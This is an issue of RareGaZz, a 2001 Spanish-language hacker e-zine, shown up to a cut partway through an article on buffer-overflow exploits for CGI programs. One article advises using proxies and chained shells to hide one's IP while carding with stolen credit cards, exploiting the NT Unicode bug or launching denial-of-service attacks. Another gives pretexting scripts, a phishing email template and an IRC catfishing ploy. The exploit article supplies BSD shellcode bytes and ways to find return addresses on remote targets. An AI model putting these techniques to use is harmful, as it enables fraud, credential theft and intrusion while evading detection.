Copy Link
Add to Bookmark
Report

RareGaZz Issue 18

eZine's profile picture
Published in 
RareGaZz
 · 30 Dec 2020

  


o$$$$$o o$$$$o ooooooooo
$$$" $$$ $$$""$$$ "$$$$$$"
$$ o$$ . . . . o$$ $$$ . . $$$$
$$o $$ o$$$$o o$$$$o o$$$o $$$ o$$$$o $$$"
o$$$$$o
$$$$$$ $$ $$$ $$ o$$ $$ $$ $$$ $$$ o$$ $$ $$$" " $$$"
$$$$$$$ "
$ $$$ $$ ,$$ $$$$$$$ $$$ $$$$$ $o$$$ $$$" $$"
$$ $$$$ $$$$$$$ $$$ $$$o .. o$$ $$ o$$$$$$ $$$o o$$$
$$$ $$ o$$ $$o $$ $$ $$ $$$oo$$$ $$" "$$ o$$$$$ooo $$$" $
$$ $$$$ $$$$$$"
$$$ $$$$$$ $$$$$$$ o$$$$$" o$$$$$$$o $$$$$$'
"
" " " " "
'Si se puede hacer, porque no hacerlo?'


<<::RareGaZz::>>

Sexto A~o .-. Cuarta Epoca .-. Numero 18

Diciembre 23 del 2001
'
'
'.', , ,
<:: ::>- -<:: ::>- -<:: ::>- -<:: ::>
' '
'
>> RareGaZz_Team << << RareGaZz >>

Ocsic :: pisco@private.as Sitio Web:
http://raregazz.cjb.net
ReYDeS :: reydes@bigfoot.com
e_mail:
^Shadown^ :: shadown@bariloche.com.ar RareGaZz-Ezine@bigfoot.com

alt3kx_h3z :: alt3kx_h3z@hotmail.com Lista:
RareDudeZ@yahoogroups.com
MagiCs :: auto2709@hushmail.com

Yo_Soy :: varf@bigfoot.com > Colaboradores <

enan0 :: ditiemef@iname.com XhereX ::
xherex@c4.com

Angel Protector ::
angelprotector@hotmail.com

<:: ::>-_-<:: ::>-_-<:: ::>-_-<:: ::>

,:' Argentina .- Chile .- Espa~a .- Mexico .- Peru .- Uruguay ,:'

------

:.:
_Contenidos_
: :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::
: : : :
: . Texto . . Tema . . Autor .
:
RGZ_00 Indice RareGaZz RareGaZz

RGZ_01 Editorial RareGaZz Editor

RGZ_02 Delitos Informaticos Leyes XhereX

RGZ_03 Anonimato en la Red Privacidad MagiCs

RGZ_04 Ingenieria Social Conceptos Basicos Angel
Protector

RGZ_05 Escribiendo BOF exploit para CGIs Hacking Ocsic

RGZ_06 Estamos Seguros? Opinion Angel
Protector

RGZ_07 Celulares & TV. Frecuencias ReYDeS

RGZ_08 Pandemonium Juerga Rare-Team

RGZ_09 Extract.c Utilidad Phrack

RGZ_0A Llaves pgp Private RareGaZz

RGZ_0B Despedida RareGaZz Editor

: :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::
:,
':.
Parafraseando..:.'


<^Shadown^> bueno amigos me voy yendo porque sino mi mujer se enoja y se lo
prometi

!.-...

<Ocsic> tenemos una bonita web,

!.-...

<alt3kx> pinche intercambio cultural :X

!.-...

<MagiCs> ReYDeS Lo que si pediria es que nadie se entere de mis datos

!.-...

<ReYDeS> yo deseo mortalizar Rare!

:!:
'.
:!_-_:!_-_:!_-_:!_-_:!_-_:!_-_:!_-_:!_-_:!_-_:!_-_:!_-_:!_-_:!_-_:!
Advertencia

RareGaZz es una publicacion electronica de emision periodica; cuyo
contenido es la expresion de las investigaciones de sus miembros;
ya sea, hecha de forma individual o grupal.

RareGaZz-Team NO se responsabiliza de la inadecuada utilizacion de
los textos presentados aqui. Asi tambien, el grupo no esta
necesariamente de acuerdo con los comentarios personales de sus
miembros.
:!_-_:!_-_:!_-_:!_-_:!_-_:!_-_:!_-_:!_-_:!_-_:!_-_:!_-_:!_-_:!_-_:!


-._ Toda la informacion presentada en RareGazz, es propiedad de los autores,
y no puede ser manipulada en parte o totalidad, sin el consentimiento de
los mismos.
-._


<<::RareGaZz::>> 1996-2001, Derechos Reservados (c)



-=-=-=-=-=-=-=-=-=-=-=-=-=-
RareGaZz
<<::La Droga sin Bajon::>>
-=-=-=-=-=-=-=-=-=-=-=-=-=-

Extraido de RareGaZz #2 ;)
: :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::
: : : :
RGZ_01 Editorial RareGaZz El Editor
: :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::


Se esperaba la emision de este numero de RareGaZz de una manera muy inusual;
pues esta es la mejor prueba de nuestra actitud y aptitud para la comunidad
internet.

Se tiene que tener un orden en casa, primero; y luego ordenar lo demas. Eso
es precisamente lo que hemos hecho en RareGaZz; ello puede justificar nuestra
extensa demora para publicar RareGaZz 18. Pero, para aquellos que visitaron
nuestra 'bonita web', comprenderan que se ha tratado de actualizarla lo mas
constantemente posible.

De igual manera, nuestra 'mitica' lista RareDudeZ, nuevamente esta en
funcionamiento; siempre al servicio de todos vosotros. La RareDudeZ sigue
siendo moderada.

RareGaZz es una eZine que no tiene patria; aunque sus origines son bien
conocidos y respetados por todos nosotros. El ser de muchos paises, conlleva a
un buen equilibrio en todos los integrantes; aunque en cuestiones de horas y
fechas, siempre se presenten algunas dificultades.

Algunos miembros nos dejaran, y nuevos miembros llegaran. El hecho concreto,
es que RareGaZz vivira!.


Ya fue suficiente con esta 'elongada' editorial.

Solo resta invitarlos a visualizar RareGaZz 18.



To quote Captain Queeg in the Herman Wouk
novel The Caine Mutiny, the system was
"
designed by geniuses to be used by idiots".


<<::RareGaZz::>>
: :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::
: : : :
RGZ_02 Delitos Informaticos Leyes XhereX
: :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::



Es un tema bastante amplio, no obstante, para tener una apreciacion mas
precisa del tema comprendamos primero a que se refiere el termino delito; la
infraccion de las leyes del estado protectoras de la seguridad privada y
publica, mediante un hecho humano cometido con la intencion directa y
perfecta. (solo es una definicion, hay diversas....)

Cada pais toma de manera distinta el asunto, algunos ya tienen leyes bien
definidas, con penas y todo y otros no. (mejor verdad?)

No explicaremos aqui en profundida a que se refieren los Delitos Informaticos
sera como una peque~a introduccion.

Siendo hoy en dia la computadora parte tan importantente del dia a dia no solo
de las grandes compa~ias sino de la personas comunes. Ya afecta cada vez mas
personas, no solo a los grandes servidores con grandes flujos de informacion.

Se tendria que definir el delito informatico como toda accion u omision (dejar
de hacer) realizada por un ser humano, que cause perjuicio a personas sin que
necesariamente se beneficie el autor o produzca un beneficio ilicito al autor
aunque no perjudique de forma directa o indirecta a la victima y esta
sancionado con una pena.


>>Caracteristicas de los Delitos Informaticos<---

- Solo un determinado numero de personas con ciertos conocimientos (tecnicos)
puede cometerlas.

- Acciones de oportunidad, se aprovecha una ocasion creada o altamente
intensificada en el mundo de funciones y organizaciones del sistema.

- Ofrecen posibilidades de tiempo y espacio, ya que en milesimas de segundo y
sin una necesaria presencia fisica pueden llegar a consumarse.

- Son muchos los casos y pocas las denuncias, por la falta de regulacion.

- Dificultades para su comprobacion, por su mismo caracter tecnico.


La informatica puede ser el objeto del ataque o el medio para cometer diversos
delitos, reune caracteristicas que la convierten en un medio idoneo para la
comision de distintas modalidades delictivas.


>>Delitos Informaticos -mas comunes-

- Falsificacion de documentos via computarizada (tarjetas de credito, cheques,
etc.)

- Lectura, sustraccion o copiado de informacion confidencial.

- Aprovechamiento indebido o violacion de un codigo para penetrar a un sistema
introduciendo instrucciones inapropiadas.

- Uso no autorizado de programas de computo.

- Alteracion en el funcionamiento de los sistemas, a traves de los virus
informaticos.

- Acceso a areas informatizadas en forma no autorizada.


>>Cada uno con objetivos distintos:

- Acceso no autorizado: Uso ilegitimo de passwords, la entrada a un sistema
informatico sin autorizacion.

- Destruccion de datos: Los da~os causados en la red mediante la introduccion
de virus, bombas logicas, etc.

- Infraccion al copyright de bases de datos: Uso no autorizado de informacion
almacenada en una base de datos.

- Interceptacion de e-mail: : Lectura de un mensaje electronico ajeno.

- Estafas electronicas: A traves de compras realizadas haciendo uso de la red.



Hasta la Proxima!

*Gracias a RareGaZz_Team y especialemente a ReYDeS por la oportunidad*


<<::RareGaZz::>>
: :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::
: : : :
RGZ_03 Anonimato en la red Privacidad MagiCs
: :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::



- :Indice:

1.Introduccion

2.Navegar anonimamente

3.Irc Anonimo

4.Anonimato en shell's

5.Condones de colores

6.Otras tecnicas de anonimato
=================================

----------------------------------
no: 1 Tema: Introduccion
----------------------------------

Buenas !!!!!
Voy a introduciros a los proxy's, ya que sera algo que vamos a usar durante
todo el articulo.
A ver, vosotros os preguntareis "
Y para que queremos usar proxy's para
navegar?" pues muy simple, cada vez que conectamos a alguna web , en esa web
se queda la ip del que ha entrado...... se guardan en los llamados log's....
Si nosotros estamos haciendo cc (Carding Card) que consiste en usar tarjetas
de creditos de otras personas o falsas para comprar cosas por internet, para
comprar esas cosas las haces a traves de la web navegando asi que se queda
tu ip logeada en el servidor, por lo tanto si usamos un proxy ya no se
quedara tu ip en el server sino el del proxy !!!!! Otra de las razones por
la que lo podemos usar es que hay proxy's que almacenan web's de ese modo si
entras 1 vez en alguna web la almacena en el server y si entras 2 pues como
se la bajo del server la primera vez va mucho mas rapido .....
Otro ejemplo claro es cuando se explota el conocidisimo bug de los NT's , el
Unicode.
Cuando lo vamos a usar, a~adimos parametros a la linea de direccion de la
web para explotarlo..... pues se queda la ip guardada en el server pero
usando un proxy pues se quedara la ip del proxy.....


Recomendacion: Usar siempre que podais proxis extranjeros .

----------------------------------
nº: 2 Tema: Navegar anonimamente
----------------------------------

Teoria:

Navegar anonimamente consiste en que la pagina web que visites no se quede
tu ip, y para ello podemos usar proxy's o hacer spoof.

Proxy's:

--Explicacion:
Tu le haces una peticion de conexion al proxy, cuando el proxy la acepta tu
le haces otra peticion al proxy diciendole que quieres ver una web.
El dibujo seria algo asi:

#### ####### #####
#tu# ===================#proxy#===================#web#
#### ####### #####


De este modo como podeis observar el proxy se encuentra entre la pagina web
y tu.
Pero si quieres navegar anonimamente has de tener en cuenta una cosa, que
hay 2 tipos de proxy's (Transparentes y anonimos).Es recomendable que se use
la anonima por que si no queremos revelar nuestra ip es por algo evidente....
Los proxys los podeis encontrar en www.multiproxy.com y tambien en el
servidor DALNET de irc ( irc.dal.net ) en el canal #e-trading .

--Como colocarlos:

-Windows:

Internet Explorer:
Arriba hay unas etiquetitas (Archivos, Edicion, Favoritos, Herramientas y
ayuda) , teneis que clickear en herramientas, luego opciones de internet, a
continuacion en la etiquetita que pone conexiones y ahi debes seleccionar tu
conexion y darle a configuracion. Una vez ahi aparece un etiqueta donde pone
usar proxy que la debemos activar si queremos usar el proxy y ahi ponemos el
proxy y el puerto. Tambien hay otro boton al lado del proxy que pone
avanzada que es por si queremos usar ese proxy para FTP, TELNET ...... Sin
querer os acabo de decir como hacer ftp , telnet ... anonimamente para que
veais.

-Linux:

Mozilla:

Arriba en las etiquetas debemos pulsar edit, luego le tenemos que dar a
preferences y luego advanced y alli lo poneis.
Tambien podeis configurar desde ahi para cuando hagamos telnet tambien se
use el proxy.
No os puedo dar mas detalles por que ahora mismo no tengo linux por desgracia
:(((, asi que no puedo dar mas detalles espero que vosotros lo tengais y lo
consigais !!! Es una chorradita !!!



----------------------------------
nº: 3 Tema: Irc Anonimo
----------------------------------

Ahora vamos a tratar de conectar a cualquier server de IRC pero anonimamente
a traves de un Proxy, aun que hay algunos servers que encriptan la ip pero
...... mejor anonimizarla.

Clientes:

El propio cliente de IRC suelen traer para poder conectarte a traves del
proxy sin tener que hacer todo esto, ahora os voy a decir como hacerlo desde
Mirc ( Windows ) y X-chat ( Linux ).


X-Chat ( Linux ):

El X-Chat arriba aparecen unas etiquetas en las cuales debemos de pinchar
para poder conectar por proxy, exactamente en;
Setting=>Setup
Ahora nos aparecera una ventanita en la cual debemos clikear en IRC y cuando
la pulsamos se extiende un "
MiniMenu " en la cual aparecera Proxy Server y
ahora solo teneis que colocar el proxy, el puerto y darle a la opcion de
usar como Firewall, Sock 4, Sock 5 o HTTP .
Esta ultima opcion ( HTTP ) si usas el proxy por el puerto 80 para conectarte
a el.

Mirc ( Windows ):

En Mirc arriba estan las etiquetas:
File=>Options
Una vez que clikeais en Options, os aparecera una especie de menu en el cual
debes pinchar en;
Connect=>Firewall
Y ahi debeis configurar para poder conectaros por Proxy .

Hostname: Debeis escribir la ip del proxy .
UserID: No escribais nada.
Password: No escribais nada.
Port: Escribid el puerto del proxy al que vais a conectar.
Luego activais la etiqueta que pone Use Firewall y un poco mas abajo elegis
la opcion Proxy .

Ahora solo queda darle a aceptar y a conectar.
El Mirc conectara al proxy y luego a el server del irc de este modo tendreis
la ip del proxy en vez de la vuestra.




----------------------------------
nº: 4 Tema: Anonimato en shell's
----------------------------------

Primero voy a explicar que es una shell y en que consiste.

Shell: Es una interfaz, a modo de linea de comandos, con la que puedes
comunicarte con la maquina y ejecutar operaciones desde ella, local o
remotamente (Por medio de telnet por ejemplo).

De nuevo vamos a usar proxy's para ir anonimos.

-Windows:
Vamos a usar el crt ( Un programa que te permite realizar conexiones a una ip
y puerto determinado ).

Primero debemos configurarlo para que use un proxy en la conexion:
Vas al menu options, submenu global options. Se nos abrira una pantallita y
seleccionamos la opcion firewall. Y aqui ponemos la ip del proxy y el tipo de
conexion (Nosotros sock4).
Despues le das a file, quick connect y pones la ip donde kieres conectar, el
puerto y marcas la opcion firewall.
Y listo, ya estamos en la shell anonimamente.
Como es logico y esta claro debemos poner la ip y puerto de la shell a la que
queremos conectar.

-Linux:
Como he dicho antes esto se configurara en el mozilla cuando lo configuremos
para meter el proxy.



----------------------------------
nº: 5 Tema: Condones de colores
----------------------------------

Le pongo este nombre al articulo por que vamos a tratar de conectarno a varias
shells para usarlas de condones y que nuestra conexion se quede muy abajo....
Como ya sabemos conectar a las shell's por proxy pues conectamos a alguna
shell a traves de algun proxy. Entonces ahora cuando estamos en la shell vamos
a conectar a otra shell haciendo un telnet:

# telnet host port

Now te pide el usuario y password que tu debes de saberlo como es logico, una
vez puestos estas dentro y ahora vamos a hacer otro telnet respectivamente
para conectar a otra shell.
Para ello hacemos el mismo paso de antes ( telnet host port ) y asi
sucesivamente varias veces, no hace falta que sean mas de 3 pero vamos ustedes
soys responsables de vuestros actos.. Yo solo os doy consejo.

Con todo lo que hemos hecho, que hemos conseguido ?

###### ######### ########## ##########
# Tu # ======= # Proxy # ======= # Shell1 # ======= # Shell2 #
###### ######### ########## ##########

Asi quedariamos, espero que lo hayais entendido.

Para conseguir shells le podeis preguntar al gran sabio ( www.google.com ),
las hay gratis que no suelen dar todos los servicios y de pago que te dan
todos los servicios...
Nota: Como he dicho antes las gratis no suelen dar todos los servicios por lo
tanto no es seguro que la shell que cogais tenga telnet, en el caso de que no
lo tenga lo que teneis que hacer es ir a buscar otra shell en otro lugar.




-----------------------------------------
nº: 6 Tema: Otras tecnicas de anonimato
-----------------------------------------


Cuando queremos hacer un DOS (Denial Of Service's ) por ejemplo, en este caso
no podemos usar proxy's pero si podemos usar spoof.No voy a explicar lo que es
un Spoof por que hay millones de txt en la red que te explica que es, en que
consiste, como se hace.......

Para mandar mails anonimos lo mas recomendable es a traves de un proxy te
conectas a un servidor STMP , estos servidores tienen el puerto 25. Y a partir
de ahi mandamos el mail. Digo lo de conectar al servidor STMP por proxy por
que cuando tu mandas el mail sale la ip que lo manda asi que es recomendable
esto....

Notas:
Existen algunas webs que te ayudan a navegar anonimamente, son servicios
totalmente gratuitos .....


Bueno, aqui ha concluido mi primer articulo, si teneis alguna duda
mandadmela al mail auto2709@hushmail.com o bien me la preguntais en el
Irc-HISPANO en el canal #Mano_izquierda . No es gran cosa pero tened en
cuenta que es una mala epoca ya que hay muchos examenes, cosas que hacer
......
Os deseo a todos ***** FELIZ NAVIDAD *****!!!!

Un saludo:


MagiCs


<<::RareGaZz::>>
: :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::
: : : :
RGZ_04 Ingenieria Social Conceptos Basicos Angel Protector
: :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::



1. Introduccion.
2. Utilidad de la Informacion Recolectada.
3. Tipos de Ataques
4. Descripcion de un Ataque.
5. Descripcion de un Ataque via Correo Postal.
6. Utilizacion de "
Ingenieria Social" On-Line.
7. Conclusion.

1. Introduccion
~~~~~~~~~~~~~~~
El termino de "
Ingenieria Social" aplicado al tema de la seguridad
informatica en general, es utilizado para describir una serie de
procedimientos o metodologias especificas (Por lo general involucradas con la
manipulacion de personas), que servirian por ejemplo a un atacante para
obtener informacion vital sobre el sistema a atacar.

Los ataques mediante tecnicas de "
Ingenieria Social" suelen gozar de un alto
grado de eficacia. En muchos de los casos, la misma esta dada por el poco
tiempo dedicado o la poca importancia que se le da en las empresas y en los
departamentos de IT a este problema.

Conceptualmente la "
Ingenieria Social" no es considerada un ataque en si
misma. Sucede que al ser la informacion de la victima, un elemento basico a
utilizar en la intrusion de sistemas, cualquier tecnica que ayude a su
obtencion debe ser considerada seriamente.


2. Utilidad de la Informacion Recolectada
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
La informacion recolectada por medio de la utilizacion de alguna de las
"
Tecnicas de Ingenieria Social" por lo general es utilizada para:

-Realizar Compras con Medios de Terceros
Por ejemplo alguien que conozca mucho acerca de usted (Sus datos personales,
tarjeta de credito, direccion, etc.) podria utilizar la informacion obtenida
para comprar via Internet o telefonicamente.

-Acceder a Internet Gratuitamente
Esto se lograria en caso de que parte de la informacion obtenida de un
usuario particular, comprenda su nombre de usuario y password de acceso a la
red.

-Acceder a Instalaciones Restringidas
En el caso de que la informacion obtenida sea por ejemplo los datos
personales, y laborales del empleado de determinada planta industrial
Conociendo estos datos un atacante podria imprimir una tarjeta como la que
normalmente utilizan los operarios de limpieza, para acceder a por ejemplo
la sala de servidores de la administracion con la cual ya habria logrado ni
mas ni menos que acceso fisico!!.

-Acceder a Sistemas Restringidos
Informacion tal como: numeros de telefonos de modems, nombres de usuario,
passwords, tipos de sistemas operativos, marca y modelo de los routers,
marca y modelo de los switches, rango de direcciones IP, nombres de
servidores o dominios, etc., son elementos sumamente utiles al momento de
decidir el tipo de ataque a utilizar en la victima.

3. Tipos de Ataques
~~~~~~~~~~~~~~~~~~~
Los metodos utilizados relacionados con la "
Ingenieria Social" pueden ser de
lo mas variados y dependen en gran parte de la inventiva que posea el
atacante.
Herramientas tales como un telefono para realizar llamadas o la propia
utilizacion del correo postal comun son instrumentos validos para obtener
informacion de una victima potencial. Tampoco se descarta la utilizacion de
mails con dominios falsos, los cuales son una herramienta excepcional para
quienes buscan perpetrar ataques masivos.

4. Descripcion de un Ataque Telefonico
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A continuacion le propongo un escenario mediante el cual podremos representar
un ataque tipico de "
Ingenieria Social", el cual creo sera de utilidad para
entender lo comentado hasta este punto.

Victima : Empresa de productos alimenticios.
Aproximadamente 280 empleados en su sitio central.
5 Personas de soporte tecnico de sistemas.
Fecha : Dia de Pago a proveedores (Por ejemplo)
Objetivo: Obtener los datos minimos necesarios para realizar una intrusion.
Tactica : Pasar por un empleado de Help Desk.


Paso 1: Conseguir algun telefono de la corporacion. Para este primer
contacto es facil identificar alguno de los telefonos de atencion al
cliente provistos en cualquiera de sus productos (Bolsas, envases, cajas,
etc.).

Paso 2: Comunicarse a este telefono y argumentando ser un proveedor que
reclama un pago, solicitar el telefono del sector de pagos.

Paso 3: Habiendo obtenido el telefono de uno de los sectores de la
empresa del cual se cree participaran usuarios con acceso a la red, el
atacante podria utilizar un argumento tan simple como el que se muestra a
continuacion:

-Usuario : Hola?
-Atacante : (Denotando prisa y fastidio) Si, buenos dias habla
Marcelo de aca de sistemas...
-Usuario : Marcelo?... de sistemas?
-Atacante : Si(con voz segura), tenes algun problema con tu usuario
de red? porque aca figura que hay algun problema!
-Usuario : Mira que yo sepa no.
-Atacante : Bueno puede ser un error nuestro, haber... decime tu...
nombre de usuario... o tu direccion de mail...
-Usuario : Si.. ehh.. es.. "
agonzalez"...
-Atacante : mmm, seguro... haber... agonzalez... agonzalez... aha
si aca estas ok, ahora dame tu actual contrase~a asi
la cambiamos por una nueva para no tener mas problemas.
-Usuario : Si... es "
marina".
-Atacante : Ok, gracias hasta luego...
-Fin del Dialogo

Lo expresado en el dialogo anterior puede sonar extra~o y bastante estupido
pero creame que existe un alto porcentaje de probabilidades de que un
atacante con un dialogo similar alcance el objetivo que se propone. Si usted
es un oficial de seguridad informatica, deberia probar esto ya mismo.

Bueno, demas esta decir que conociendo el usuario y password de un empleado
del sistema victima, las cosas seran mucho mas facil para el atacante.


5. Descripcion de un Ataque via Correo Postal
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Si el atacante requiriera informacion en abundancia de una victima en
particular, seguramente pondria en marcha un ataque utilizando alguna
casilla de correo postal tradicional.

Paso 1: El atacante contrata una casilla de correo.

Paso 2: Toma como patron alguna promocion que haya visto circular por su zona
(Por ejemplo las tipicas suscripciones a revistas, cupones de
descuento, los famosos sorteos de Readers Digest, o similar) y genera
los formularios correspondientes tratando en lo posible de imitar con
la mayor fidelidad posible los originales, modificando solo la
direccion original por la de la casilla de correo por la del atacante.
Obviamente la propuesta debe llamar realmente la atencion para de
esta forma provocar al menos la curiosidad por parte de la victima.
De ser posible el atacante intentara solicitar a la victima incluir
algun tipo de clave en el formulario argumentando que esta podria
servirle para reclamar su premio. (Esto debido a que esta comprobado
que el usuario promedio siempre utiliza el mismo juego de claves para
todo, sus tarjetas, bancos, acceso a Internet, acceso a la PC de su
trabajo, etc.)

Paso 3: El atacante designara la zona en la que se implementara el ataque via
mailing. (Seguramente tratara de enviar las cartas a la zona de la
compa~ia a atacar, obviamente cuando esto sea aplicable)

Paso 4: La victima recibe la correspondencia dejada bajo la puerta por el
atacante y con un poco de suerte completa los datos y los envia
directo a la casilla establecida.

Paso 5: El atacante retira de su casilla de correo los formularios que han
sido completados por la victima. Ya con la informacion en su poder el
atacante procedera con toda tranquilidad a planear la concrecion del
ataque.

5. Ataque via Mail (Correo Electronico)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Este tipo de ataques son posibles gracias a la efectividad que tienen en los
usuarios normales los mails provenientes de entidades publicas o servicios
privados.
Existen en Internet una gran cantidad servidores que permiten a una persona
enviar un mail desde la web sin involucrar su cuenta original ya que el
mensaje llegaria a su receptor encabezado con la cuenta de mail provista por
el servicio de estos servidores (Remailers).

Ahora si de temer se trata, los ataques mas efectivos se podrian lograr
utilizando programas del tipo "
Ghost Mail" el cual permite generar
encabezados de mails de lo mas ingeniosos, con nombres de dominio tan
variados, como: "
pepito@presidencia.gov", "laura@ciudad.com.ar", etc.

Otra posibilidad mas elegante elegida por el perfil de atacantes mas bien
tecnicos, es la utilizacion de algunos defectos en varias de las
implementaciones corrientes de SMTP.

Cualquiera de estas tecnicas se podria utilizar para lograr que la victima
envie informacion como ser datos personales o cualquier otro tipo de
informacion de utilidad para el atacante.

Por ejemplo, que haria usted si recibiera un mail de este tipo:

-----Mensaje original-----
De: ffiorella@ciudad.com.ar [mailto:ffiorella@ciudad.com.ar]
Enviado el: Wednesday, July 5, 2000 3:46 PM
Para: victima@servidordelavictima.com
Asunto: Invitacion de Ciudad Internet

Nos dirigimos a usted, con la intencion de otorgarle el privilegio
de formar parte de las 2000 personas seleccionadas para evaluar
nuestro nuevo servicio de acceso a Internet por cable.
Nuestra intencion es la de brindarle un servicio de "
Cable Modem"
sin cargo por el termino de tres meses, tiempo en el cual debera
evaluar la calidad del servicio ofrecido.

Por este motivo es que le solicitamos nos envie este mismo mail
con el correspondiente formulario completo.

Desde ya muchas gracias,

Fiorella Diaz
Atencion al Cliente

Nombre y Apellido [ ]
Actual Proveedor de Internet [ ]
Nombre de Usuario asignado por el proveedor [ ]
Clave asignada por el proveedor [ ]
-----Fin del Mensaje-----

Ok, si usted esta leyendo este documento quizas usted no sea el mejor ejemplo
de "
victima" pero seguramente entre cientos de mails, alguno le dara al
atacante el resultado esperado.


6. Utilizacion de "
Ingenieria Social" On-Line
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
De todas las formas anteriormente expuestas, la "
Ingenieria social On-Line"
es quizas la que se practica con mayor frecuencia.
Los medios por excelencia donde se dan este tipo de ataques, suelen ser los
canales de IRC dedicados a los principiantes del chat.

#iniciados, #ayuda, #newbies, #irchelp son algunos de los sitios utilizados
por los atacantes para encontrar personas sin experiencia en Internet, que
sean faciles de enga~ar.

El sistema por excelencia, es sin duda aquel en que un atacante se hace pasar
por una ni~a con Nicknames del tipo Paola28, Sexygirl18, o cualquier otro que
inspire curiosidad.

La tactica pasara por conversar con la victima de forma tal de ganar su
confianza y provocarle el interes necesario como para que no pare de querer
hablar con la supuesta "
se~orita" enamorada.
Un buen ataque puede llevarle al atacante un par de dias. Al final cuando la
victima este totalmente enganchada con el atacante, este seguramente
argumentara algo como esto en su proxima sesion de chat:

Start of Pedro buffer: Fri Jul 07 18:04:25 2000
Session Ident: Pedro (~Pedro@200.47.xx.xxx)

<Pedro> Hola Paola28!! como estas te extra~e! que paso?
<Paola28> Nada solo que esta por expirar mi acceso a Internet, es por
eso que estoy hablandote desde la cuenta de un amigo.
<Pedro> Eso significa que quizas no hablemos mas?
<Paola28> Y si... al menos hasta que pueda pagar una.
<Pedro> Es una lastima me encantaria seguir chateando contigo!
<Paola28> Mira, lo que se me ocurre es conseguir alguien que me preste
su nombre de cuenta para poder acceder al chat y seguir charlando
contigo!!
<Pedro26> Y por que no usas la mia?
<Paola28> sic...

Bien, es cierto que la informacion recopilada no es demasiado importante,
pero seguramente a quien la obtuvo, le proporcionara un tiempo valioso de
conexion para seguir con sus Hackeos, asi como una cuenta "
limpia" desde la
cual actuar.

Asi mismo, no deberiamos descartar que ataques de este tipo podrian ser
perpetrados incluso en peque~as corporaciones con un esquema de seguridad
absolutamente deficiente, los cuales dejen libradas las conexiones de
Internet de sus dos o tres empleados, a su buena fe.
Si esto sucediera, existiria un alto porcentaje de probabilidades que dichos
usuarios utilicen el servicio de chat de Internet en sus tiempos laborales
ociosos.

7. Conclusion
~~~~~~~~~~~~~
Si al terminar de leer este peque~o articulo usted sintio al menos una
peque~a cuota de curiosidad o preocupacion, el objetivo del mismo estara
cumplido.

Los riesgos de la "
Ingenieria Social", deberian ser tenidos en cuenta en los
programas de seguridad de su empresa, asi como tambien en su propio hogar, ya
que estos pueden ser el punto de partida de un ataque mas sofisticado.

Uno de los mayores problemas a los que se enfrentan los oficiales de
seguridad al implementar un plan integral, es sin lugar a duda el de lograr
el apoyo de la comunidad que debe ser protegida (Usuarios de los sistemas,
empleados de la empresa, etc.)

Para que la aplicacion de un esquema de seguridad sea exitoso, debe contar
con el entendimiento absoluto por parte de los usuarios de las normas a
aplicar, asi como tambien de los riesgos y da~os potenciales en los que se
podrian ver envueltos los sistemas de la compa~ia.



<<::RareGaZz::>>
: :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::
: : : :
RGZ_05 Escribiendo BOF exploits para CGIs Hacking ocsic
: :.:..:...:....:.....:......:.......:........:.........:..........: : : ::::


Nota
+=+=

Para leer esta guia es necesario tener conocimientos sobre explotacion
de buffer overflows. Ademas esta guia no entrega shellcodes solo intenta
mostrar las diferencias que hay al explotar CGIs.

Consideraciones
+=+=+=+=+=+=+=+

La especificion de CGI, establece una forma de comunicacion entre el
programa CGI y el webserver. Al ejecutarse el CGI debe enviarse una cadena
de la forma 'Content-type: XXXX', donde XXXX es el tipo de contenido que
el CGI enviara al webserver y seguido de todos los headers que el CGI
necesite establecer, Ej: Cookies, Redirecciones, etc. Cuando ya no
necesita enviar nada al webserver, envia un CRLF y empieza a enviar los
datos en si. Entonces al construir un exploit en un CGI, es necesario
enviar esa cadena o el webserver dara error. Agregando este codigo antes
de un shellcode, envia la cadena (todo los shellcodes son para BSD).

char print_hdr[] = {
"
\x31\xc0\x6a\x1b\xeb\x09\x6a\x01\x50\xb0\x04\xcd\x80\xeb\x21\xe8"
"
\xf2\xff\xff\xffContent-type: text/html\r\n\r\n"
};



El problema de la pila
=+=+=+=+=+=+=+=+=+=+=+

Al explotar un BOF en una aplicacion local obtenemos un valor de la pila a
traves de una funcion get_esp() o parecida, esta funcion nos da un valor
cercano al que tendra el buffer a explotar. Pero en los CGI nosotros no
podemos usar esa funcion, ya que la victima es remota. Aqui voy a explicar
algunos metodos que pueden ser usados.

Fuerza Bruta
=+=+=+=+=+=+

Esto no hay que explicarlo mucho, solo recordar que en cada OS la pila
tiene una direccion base (recuerda que la pila crece hacia abajo) y que
cada arquitectura trabaja con un tama~o de datos, por ej: la i386 en modo
protegido trabaja con 4 bytes, entonces las direcciones siempre van a ser
multiplos de 4. Ademas las variables de entorno se guardan en la pila asi
que la direccion va a ser mas baja entre mas datos le hayas mandado a una
varible de entorno (HTTP_USER_AGENT, etc).


Variables Globales
=+=+=+=+=+=+=+=+=+

Las variables globales son guardadas despues del codigo, y como el
codigo no cambia de tama~o, las direcciones de las variables globales
tampoco cambian, asi que se pueden usar para ejecutar la shellcode.


char UserAgent[256];

main() {
char *ptr;
char buf[256];

strcpy(UserAgent, getenv(HTTP_USER_AGENT));
strcpy(buf, getparam("
data"));
}


Solo habria que pasar la shellcode en el encabezado 'User-Agent' y la
direccion de la variable UserAgent como direccion de retorno.


Malloc
=+=+=+

malloc() permite guardar dinamicamente memoria para el uso de la
aplicacion. malloc() internamente utiliza las funciones sbrk() y brk()
para conseguir memoria. brk() establece la direccion mas baja para el
segmento de datos. sbrk() incrementa la direccion base del segmento.
Una aplicacion pidiendo datos de memoria seria asi

,---------------. --- 0x1000
| Codigo |
| ejecutable |
| |
|---------------|---- 0x1040
| Datos |
|_______________|___ Pos mas baja, digamos 0x1080

